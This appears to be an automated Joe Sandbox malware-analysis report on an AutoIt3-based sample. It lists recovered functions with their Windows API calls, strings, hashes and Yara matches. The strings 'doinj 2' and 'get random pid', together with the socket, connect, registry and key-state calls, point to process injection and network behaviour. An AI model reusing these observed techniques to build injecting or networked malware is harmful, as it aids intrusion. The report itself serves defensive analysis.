KEYS, xrefs: 00CA232F
EXISTS, xrefs: 00CA2340
APPEND, xrefs: 00CA2351
REMOVE, xrefs: 00CA231E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: f778cc90c3c5d146ed23501c2bd1ac042c6d18c057f32b6a4e70fc5f96aa5a6a
Instruction ID: 3206afaa3618a3f72b13d92ccc1f313fe85e65747a66ecc9fb4482638bad07eb
Opcode Fuzzy Hash: f778cc90c3c5d146ed23501c2bd1ac042c6d18c057f32b6a4e70fc5f96aa5a6a
Instruction Fuzzy Hash: FA11827090112D9FCF00EF94C8509FEB3B8FF16304F208195D81067262DB325E06DB40

Function 0471E210 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 150sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 047221B8: GetFileAttributesA.KERNEL32(00000000,?,?,?,?,0470AD04,00000000,0470B1B3,?,?,00000000,00000000), ref: 047221FA

Part of subcall function 04724F14: MessageBoxA.USER32(00000000,00000000,04724F74,00040040), ref: 04724F47

Sleep.KERNEL32(00001388,00000000,0471E3EC,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0471E2BA

Strings

lp.txt, xrefs: 0471E3B3
doinj 2 , xrefs: 0471E246
get random pid , xrefs: 0471E37C
c:\debugg, xrefs: 0471E22D, 0471E35A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AttributesFileMessageSleep
String ID: c:\debugg$doinj 2 $get random pid $lp.txt
API String ID: 2390311571-790285813
Opcode ID: de5469fd1433ae6ed2446fb0416d7347b509b5c4b8fa619628d513e1d8f62d83
Instruction ID: 71fa2c90dbb4c4f27d1d0c0e7c2f8b662b48aa26b82ade6aab0cd1d70f649af0
Opcode Fuzzy Hash: de5469fd1433ae6ed2446fb0416d7347b509b5c4b8fa619628d513e1d8f62d83
Instruction Fuzzy Hash: 1A417E346002559FFB11FBBCCA889AE73A9FF85308B5141A4ED50BB360DB64FD058BA1

Function 00CC0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

Part of subcall function 00CC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC040D,?,?), ref: 00CC1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CC07E3
RegCloseKey.ADVAPI32(?,?), ref: 00CC080F
RegCloseKey.ADVAPI32(00000000), ref: 00CC081C

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 2f9938264ae08e300f9daaae1d4740523bbfa4b0121d0b38f2f7db3fda6823e9
Instruction ID: 0d6bc56603c2e923ba26a000b938a40075bd906210d5b4e8cae2d6e4ab4450fb
Opcode Fuzzy Hash: 2f9938264ae08e300f9daaae1d4740523bbfa4b0121d0b38f2f7db3fda6823e9
Instruction Fuzzy Hash: 39515A71208204AFD704EF68C885F6EB7E9FF84704F14891DF996872A2DB31E949DB52

Function 00CAEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CAEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CAEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CAECCA

Part of subcall function 00C44D37: __itow.LIBCMT ref: 00C44D62
Part of subcall function 00C44D37: __swprintf.LIBCMT ref: 00C44DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CAECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CAECF7

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 426ce2af8a3cdd6e577eef2a95cba84e5abe50d78d9659f3088c36786835cc32
Instruction ID: f218d0e4033875a0b3cea61c1b347cf60f6dc5e927628c3f461945582458101d
Opcode Fuzzy Hash: 426ce2af8a3cdd6e577eef2a95cba84e5abe50d78d9659f3088c36786835cc32
Instruction Fuzzy Hash: C2511A35A00505DFCB15EF64C985AAEBBF5FF09314B288099E849AB362CB31ED51DB90

Function 00CCA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04320afb6a3724e482210a50205243aa1e84b4389e939001b9021af249534ab5
Instruction ID: 8729802eae2d50a775f7d5df42fc15a3f65765577e621cd557b100c9e312b327
Opcode Fuzzy Hash: 04320afb6a3724e482210a50205243aa1e84b4389e939001b9021af249534ab5
Instruction Fuzzy Hash: 6841D435900118AFD710DB28CC8CFA9BBB8FB09314F150269F92AE72D1D770AE41DB51

Function 00C42714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C42727
ScreenToClient.USER32(00D077B0,?), ref: 00C42744
GetAsyncKeyState.USER32(00000001), ref: 00C42769
GetAsyncKeyState.USER32(00000002), ref: 00C42777

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0287bc67b4fc80d8d63dea8088b852f89cebb2ae541bd8988b0bfacf1831f6e1
Instruction ID: 4e15c7eeb7b20ef976d7577ea4712ede781f8250c8c2efa9633afc1642147983
Opcode Fuzzy Hash: 0287bc67b4fc80d8d63dea8088b852f89cebb2ae541bd8988b0bfacf1831f6e1
Instruction Fuzzy Hash: 2D413D7550411AFFDF159F69C884FE9BB74FB05324F60835AF828A62A0C734AE50EB91

Function 047438F4 Relevance: 7.6, APIs: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0474392D
SetFilePointer.KERNEL32(000000FF,000000F8,00000000,00000002,00000000,047439DB,?,00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000), ref: 04743961
GetLastError.KERNEL32(000000FF,000000F8,00000000,00000002,00000000,047439DB,?,00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0474396D
ReadFile.KERNEL32(000000FF,0474304B,00000008,?,00000000,000000FF,000000F8,00000000,00000002,00000000,047439DB,?,00000000,80000000,00000001,00000000), ref: 04743991
CloseHandle.KERNEL32(000000FF,047439E2,?,00000000,000000FF,000000F8,00000000,00000002,00000000,047439DB,?,00000000,80000000,00000001,00000000,00000003), ref: 047439D5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastPointerRead
String ID:
API String ID: 3550223206-0
Opcode ID: eb3890453f8309b8c4a87aa5c97cbca7f95940bbe6ff26f302d1e05dcc9b0513
Instruction ID: f79e85250ecc68c2e7315adacb3066d224209af4ee6a099b206660cc837fa118
Opcode Fuzzy Hash: eb3890453f8309b8c4a87aa5c97cbca7f95940bbe6ff26f302d1e05dcc9b0513
Instruction Fuzzy Hash: 0C213A30B08348AEEF10E6F48C41BFDB7A8DB85318F50429AEAA4E7BC1E77175458765

Function 04741C44 Relevance: 7.6, APIs: 5, Instructions: 84threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 04741C6F
GetClassNameA.USER32(?,00000000,00000000), ref: 04741C94
GetWindowTextA.USER32(?,00000000,00000000), ref: 04741CC3
IsWindowVisible.USER32(?), ref: 04741CD3
GetCurrentProcessId.KERNEL32(00000000,04741D31,?,?,00000000,00000000,00000000,00000000), ref: 04741CDC

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Window$Process$ClassCurrentNameTextThreadVisible
String ID:
API String ID: 2023830111-0
Opcode ID: 7e7f95ec7bc6a59c49fac2b5fa112caceb0e70dbeee297cc5c0113a952f69232
Instruction ID: 181179af60a17168722146e43d2b98216a4eb71abb907bc20ed04dd1e85ac06c
Opcode Fuzzy Hash: 7e7f95ec7bc6a59c49fac2b5fa112caceb0e70dbeee297cc5c0113a952f69232
Instruction Fuzzy Hash: 2F211BB0600209AFEB04FBA0DC84DBF77BDEF94204FA1857AA55197615EF70BD458A28

Function 0470C522 Relevance: 7.6, APIs: 5, Instructions: 78networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0470C608: closesocket.WS2_32(?), ref: 0470C60F

socket.WS2_32(00000002,00000001,00000006), ref: 0470C565
htons.WS2_32(?), ref: 0470C58C
inet_addr.WS2_32(?), ref: 0470C599
gethostbyname.WS2_32(?), ref: 0470C5B0
connect.WS2_32(?,00000002,00000010), ref: 0470C5D5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonsinet_addrsocket
String ID:
API String ID: 1954806591-0
Opcode ID: 662f519ee8202099c28ce619633d167c9cf04099e35239bf0f4efe68b908e3c9
Instruction ID: d0150ce2aa4422613ddd8e0aa1da9ff8ff007e458f3c0622bccdc05cc95358a8
Opcode Fuzzy Hash: 662f519ee8202099c28ce619633d167c9cf04099e35239bf0f4efe68b908e3c9
Instruction Fuzzy Hash: CC21A174A01208DFDB29DFA8C885AAEB7F8EF08704F608669E555E77D0E674F9018B50

Function 0470C524 Relevance: 7.6, APIs: 5, Instructions: 77networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0470C608: closesocket.WS2_32(?), ref: 0470C60F

socket.WS2_32(00000002,00000001,00000006), ref: 0470C565
htons.WS2_32(?), ref: 0470C58C
inet_addr.WS2_32(?), ref: 0470C599
gethostbyname.WS2_32(?), ref: 0470C5B0
connect.WS2_32(?,00000002,00000010), ref: 0470C5D5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonsinet_addrsocket
String ID:
API String ID: 1954806591-0
Opcode ID: 46f7adad5db700fd3af830a19260baf33188cf9fe384efd134c6e27a8364614c
Instruction ID: 8d99c18da333d94ff3b2a5c0fd020e13ea3976e235d622ae58b93a87f84c0adc
Opcode Fuzzy Hash: 46f7adad5db700fd3af830a19260baf33188cf9fe384efd134c6e27a8364614c
Instruction Fuzzy Hash: 3221A174A01308DFDB29DFA8C885AAEB7F8EF08704F608669E515E77D0E674F9018B50

Function 04741620 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04741658
CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 04741670
GetDeviceCaps.GDI32(00000000,00000008), ref: 0474167A
GetDeviceCaps.GDI32(00000000,0000000A), ref: 04741684
ReleaseDC.USER32(00000000,00000000), ref: 047416C7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateRelease
String ID:
API String ID: 2571409768-0
Opcode ID: 1145c4417b7dee45567f6eb351920efa395817ff44fb94f4839a3a9281c9b018
Instruction ID: e11ae5885a24d4241874aad5e0237ec01f5360928716af9eb8db0348bc07c118
Opcode Fuzzy Hash: 1145c4417b7dee45567f6eb351920efa395817ff44fb94f4839a3a9281c9b018
Instruction Fuzzy Hash: 70215770B003086FEB01FBA5CC85B6FB7B9EB89704F904469A654B7740EB747E418A69

Function 00CB6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00CB6159
GetForegroundWindow.USER32 ref: 00CB6170
GetDC.USER32(00000000), ref: 00CB61AC
GetPixel.GDI32(00000000,?,00000003), ref: 00CB61B8
ReleaseDC.USER32(00000000,00000003), ref: 00CB61F3

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4c30120accb0bc4e9e983833d531674aa55d9e6d968ffc9b1fce22a1431a759e
Instruction ID: 5ebb512eaa6798f8a1df60e356f864fee590927c816ac7b45b4b26b799f66151
Opcode Fuzzy Hash: 4c30120accb0bc4e9e983833d531674aa55d9e6d968ffc9b1fce22a1431a759e
Instruction Fuzzy Hash: 2421A175A01204AFD704EF69DC84BAEBBF9EF88310F148469F84A97252CA30EC01DB90

Function 0472C364 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472C3BA
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0472C3CF
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0472C3D9
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0472AF1B,00000000,0472AFA7), ref: 0472C3FD
ReleaseDC.USER32(00000000,00000000), ref: 0472C408

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: d8e93dd4aad4d85c58ff7f813e05b3e46efe9cdb1fd636f297eaeec593adcabb
Instruction ID: cc3982e06316f63a7c66f799218b517d46c9d0ccfbd88daa8077ea5d025c9d45
Opcode Fuzzy Hash: d8e93dd4aad4d85c58ff7f813e05b3e46efe9cdb1fd636f297eaeec593adcabb
Instruction Fuzzy Hash: B411D3216013B99FEB21EF64CA44BEF3B94AF51355F041524F9809B780E7B4A891C3E2

Function 00C9C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C9C84C
_memcmp.LIBCMT ref: 00C9C86A
_memcmp.LIBCMT ref: 00C9C87D
_memcmp.LIBCMT ref: 00C9C895
_memcmp.LIBCMT ref: 00C9C8AD

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 113f894b6bbed434457cf2563a99c113b271895006816ecd1b2158467e0377f7
Instruction ID: cdcdccf3dd45bbdb6c28f46ba7f4e9a9914f391c57ec837ed94ac257a3d0d178
Opcode Fuzzy Hash: 113f894b6bbed434457cf2563a99c113b271895006816ecd1b2158467e0377f7
Instruction Fuzzy Hash: C901F562A001053BDA106111DCCAFBB731CDB60384F0C4136FE1696781E7A0DF2192E9

Function 0470AA20 Relevance: 7.6, APIs: 5, Instructions: 59threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0470AA2E
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0470AA5A
MsgWaitForMultipleObjects.USER32(00000002,?,00000000,000003E8,00000040), ref: 0470AA6F
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0470AA9C
GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 0470AAA7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
String ID:
API String ID: 1797888035-0
Opcode ID: 6bcce62dd5bc3d8c78f191ae0aaf28d3ecec2ba3de80e2be6cbacb980378a10b
Instruction ID: 261ccb097986dfda9e2217102792a3b4d2d7c8ad29e658ad9ded04bcd27a43fb
Opcode Fuzzy Hash: 6bcce62dd5bc3d8c78f191ae0aaf28d3ecec2ba3de80e2be6cbacb980378a10b
Instruction Fuzzy Hash: BE11A1B1B45311ABE620EAB8CCC6F5E73CC9B54624F10CA19F694DB3C0EA74F8414756

Function 047287F4 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472880C
GetDeviceCaps.GDI32(?,00000068), ref: 04728828
GetPaletteEntries.GDI32(56080EFF,00000000,00000008,?), ref: 04728840
GetPaletteEntries.GDI32(56080EFF,00000008,00000008,?), ref: 04728858
ReleaseDC.USER32(00000000,?), ref: 04728874

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 94e6be6cd5d2608c04f32eb42d1f0d4d6361981e5a61dc5cb3a3153efc5595bd
Instruction ID: 73bee37cbb98d55e163aa1a8e20bdd89d4073496b2f692a4bc1261a7e9a0657a
Opcode Fuzzy Hash: 94e6be6cd5d2608c04f32eb42d1f0d4d6361981e5a61dc5cb3a3153efc5595bd
Instruction Fuzzy Hash: CF112676648304BFFB00EBA4CC85FAD77ACE705704F048099F644DA2C1EAB6A855CB25

Function 0179E42D Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0179E4C4,?,?,00000000), ref: 0179E445

Part of subcall function 0179E1A5: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0179E1C3

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0179E4C4,?,?,00000000), ref: 0179E475
EnumCalendarInfoA.KERNEL32(Function_00009379,00000000,00000000,00000004), ref: 0179E480
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0179E4C4,?,?,00000000), ref: 0179E49E
EnumCalendarInfoA.KERNEL32(Function_000093B5,00000000,00000000,00000003), ref: 0179E4A9

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: a7f2398651bbffc42f8022d684a16f50a256c1876071ba47c1639ff756330e2b
Instruction ID: d7075d27d2812746e185cc3be32ddcfa70296fb9492a7ee746453da360506c37
Opcode Fuzzy Hash: a7f2398651bbffc42f8022d684a16f50a256c1876071ba47c1639ff756330e2b
Instruction Fuzzy Hash: 340126B0204209BBEF02E6B5FC16F6AF25CEB56720F614570F514E76D8DE64AE0882A1

Function 046FB8A8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,046FB93F,?,?,00000000), ref: 046FB8C0

Part of subcall function 046FB620: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 046FB63E

GetThreadLocale.KERNEL32(00000000,00000004,00000000,046FB93F,?,?,00000000), ref: 046FB8F0
EnumCalendarInfoA.KERNEL32(Function_0000A7F4,00000000,00000000,00000004), ref: 046FB8FB
GetThreadLocale.KERNEL32(00000000,00000003,00000000,046FB93F,?,?,00000000), ref: 046FB919
EnumCalendarInfoA.KERNEL32(Function_0000A830,00000000,00000000,00000003), ref: 046FB924

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: ba691744f3028ebe1b85f179c03603b18e8c955d45f5378724f5135879dc1e75
Instruction ID: 49cf4774e502ca0dc7a2db56e2038e6deddb0f4759a9f3236d5a3dfaa00a2d7c
Opcode Fuzzy Hash: ba691744f3028ebe1b85f179c03603b18e8c955d45f5378724f5135879dc1e75
Instruction Fuzzy Hash: 2C01A2717406096BF701AB74CD12B6A725CDB46F28F900568F790EABD4F664BE0146A8

Function 00C4E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00C60FE6: std::exception::exception.LIBCMT ref: 00C6101C
Part of subcall function 00C60FE6: __CxxThrowException@8.LIBCMT ref: 00C61031

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

Part of subcall function 00C51680: _memmove.LIBCMT ref: 00C516DB

__swprintf.LIBCMT ref: 00C4E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C4E431

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 3a491b1b414ba4b3f0d2bf33d198826df1f33fbaf735350b209859b3c2c1faa2
Instruction ID: 5160f643e9dbb4012a909160812590e52de11064acb728aeb8e0d7628795bd3b
Opcode Fuzzy Hash: 3a491b1b414ba4b3f0d2bf33d198826df1f33fbaf735350b209859b3c2c1faa2
Instruction Fuzzy Hash: E591CD751182009FC724FF24C889D6EB7A8FF95304F45091DF892972A1EB70EE88DB96

Function 00C60654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00C60690
#, xrefs: 00C60699

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 7d27d8e721ad03dbe55ded66aae9ccf99809f31b7f353bdd756c2e84b6ba622f
Instruction ID: 57a1edda372491d4d17d6cdae4c81ce082ef0eae62f466ea90fc41006f55608b
